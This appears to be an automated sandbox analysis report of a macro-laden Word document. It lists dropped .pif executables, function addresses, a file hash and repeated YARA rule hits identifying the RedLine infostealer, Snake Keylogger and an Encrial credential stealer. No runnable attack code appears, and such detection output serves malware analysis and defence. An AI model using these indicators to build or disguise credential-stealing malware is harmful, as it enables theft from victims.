                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 15_2_2007D3D815_2_2007D3D8
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 15_2_2007D3E815_2_2007D3E8
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 15_2_20086C1815_2_20086C18
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 15_2_20089EB015_2_20089EB0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 15_2_20087AF015_2_20087AF0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 15_2_200865C015_2_200865C0
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 15_2_2008DA0015_2_2008DA00
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 15_2_2008DA0515_2_2008DA05
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 15_2_2008461015_2_20084610
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 15_2_2008462015_2_20084620
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: 15_2_20081A4015_2_20081A40
                  Source: ITT # KRPBV2663 .docOLE, VBA macro line: Sub AutoOpen()
                  Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function AutoOpenName: AutoOpen
                  Source: ITT # KRPBV2663 .docOLE indicator, VBA macros: true
                  Source: Joe Sandbox ViewDropped File: C:\Users\Public\Libraries\jphwmyiA.pif BDFA725EC2A2C8EA5861D9B4C2F608E631A183FCA7916C1E07A28B656CC8EC0C
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: String function: 0040D606 appears 48 times
                  Source: C:\Users\Public\Libraries\jphwmyiA.pifCode function: String function: 0040E1D8 appears 88 times
                  Source: C:\Windows\SysWOW64\brightness.exeCode function: String function: 027C8798 appears 54 times
                  Source: C:\Windows\SysWOW64\brightness.exeCode function: String function: 027B44D0 appears 33 times
                  Source: C:\Windows\SysWOW64\brightness.exeCode function: String function: 027B480C appears 931 times
                  Source: C:\Windows\SysWOW64\brightness.exeCode function: String function: 027B44AC appears 74 times
                  Source: C:\Windows\SysWOW64\brightness.exeCode function: String function: 027C881C appears 45 times
                  Source: C:\Windows\SysWOW64\brightness.exeCode function: String function: 027B46A4 appears 244 times
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFCode function: String function: 028B480C appears 619 times
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFCode function: String function: 028B46A4 appears 154 times
                  Source: C:\Users\Public\Libraries\Aiymwhpj.PIFCode function: String function: 028C8798 appears 48 times
                  Source: 10.2.jphwmyiA.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 19.1.jphwmyiA.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 19.2.jphwmyiA.pif.22770ee8.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 19.2.jphwmyiA.pif.22770ee8.5.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 19.2.jphwmyiA.pif.22770ee8.5.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 10.2.jphwmyiA.pif.23600ee8.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 10.2.jphwmyiA.pif.23600ee8.4.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 10.2.jphwmyiA.pif.23600ee8.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 10.2.jphwmyiA.pif.20d899de.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 10.2.jphwmyiA.pif.20d899de.3.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 10.2.jphwmyiA.pif.20d899de.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 10.2.jphwmyiA.pif.20d899de.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 10.2.jphwmyiA.pif.23600000.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 19.2.jphwmyiA.pif.400000.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 15.2.jphwmyiA.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 19.2.jphwmyiA.pif.24c70000.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 19.2.jphwmyiA.pif.24c70000.6.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 19.2.jphwmyiA.pif.24c70000.6.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 15.2.jphwmyiA.pif.1e710ee8.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 10.2.jphwmyiA.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 19.2.jphwmyiA.pif.225499de.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 19.2.jphwmyiA.pif.225499de.2.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 19.2.jphwmyiA.pif.225499de.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 10.2.jphwmyiA.pif.23600000.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 10.2.jphwmyiA.pif.23600000.5.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 10.2.jphwmyiA.pif.23600000.5.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 10.2.jphwmyiA.pif.23660000.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 10.2.jphwmyiA.pif.23660000.6.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 10.2.jphwmyiA.pif.23660000.6.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 12.2.Aiymwhpj.PIF.211f67a8.7.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 15.2.jphwmyiA.pif.1e710ee8.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 15.2.jphwmyiA.pif.1e710ee8.4.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 15.2.jphwmyiA.pif.1e710ee8.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 19.2.jphwmyiA.pif.24c70000.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 19.2.jphwmyiA.pif.24c70000.6.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 19.2.jphwmyiA.pif.24c70000.6.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 10.3.jphwmyiA.pif.1f2f18e0.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 10.2.jphwmyiA.pif.20d899de.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 19.1.jphwmyiA.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 10.2.jphwmyiA.pif.23600000.5.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 19.2.jphwmyiA.pif.2254a8c6.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 7.2.brightness.exe.215f2418.10.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 10.2.jphwmyiA.pif.20d8a8c6.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 10.2.jphwmyiA.pif.23600000.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 15.2.jphwmyiA.pif.1be499de.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 19.2.jphwmyiA.pif.2254a8c6.3.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 19.2.jphwmyiA.pif.2254a8c6.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 10.2.jphwmyiA.pif.23600ee8.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 7.2.brightness.exe.21659f78.11.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 19.2.jphwmyiA.pif.22770000.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 19.2.jphwmyiA.pif.22770000.4.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 19.2.jphwmyiA.pif.225499de.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 19.2.jphwmyiA.pif.225499de.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 19.2.jphwmyiA.pif.225499de.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 10.3.jphwmyiA.pif.1f2f18e0.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 10.2.jphwmyiA.pif.20d899de.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 10.3.jphwmyiA.pif.1f2f18e0.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 19.2.jphwmyiA.pif.22770000.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 15.1.jphwmyiA.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 19.2.jphwmyiA.pif.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 15.2.jphwmyiA.pif.1ed60000.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 15.2.jphwmyiA.pif.1ed60000.6.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 19.2.jphwmyiA.pif.2254a8c6.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 10.2.jphwmyiA.pif.23600ee8.4.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 12.2.Aiymwhpj.PIF.212333d8.6.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 19.2.jphwmyiA.pif.22770000.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 15.2.jphwmyiA.pif.1ed60000.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
